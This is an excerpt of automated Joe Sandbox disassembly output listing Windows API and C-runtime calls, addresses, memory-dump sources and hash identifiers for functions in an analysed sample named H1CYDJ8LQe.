                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                            • String ID:
                                                            • API String ID: 3691411573-0
                                                            • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                            • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                            • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                            • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                            • EndPath.GDI32(?), ref: 004472D6
                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                            • String ID:
                                                            • API String ID: 372113273-0
                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0044CC6D
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041708E
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __amsg_exit.LIBCMT ref: 004170AE
                                                            • __lock.LIBCMT ref: 004170BE
                                                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                            • _free.LIBCMT ref: 004170EE
                                                            • InterlockedIncrement.KERNEL32(02E82CE0), ref: 00417106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                            • String ID:
                                                            • API String ID: 3470314060-0
                                                            • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                            • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 442100245-0
                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 621800784-4108050209
                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                            • String ID: \VH
                                                            • API String ID: 3884216118-234962358
                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                            • IsMenu.USER32(?), ref: 0044854D
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                            • DrawMenuBar.USER32 ref: 004485AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID: 0
                                                            • API String ID: 3076010158-4108050209
                                                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1589278365-1403004172
                                                            • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                            • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: SysAnimate32
                                                            • API String ID: 0-1011021900
                                                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            • GetFocus.USER32 ref: 0046157B
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                            • __swprintf.LIBCMT ref: 00461608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                            • String ID: %s%d
                                                            • API String ID: 2645982514-1110647743
                                                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
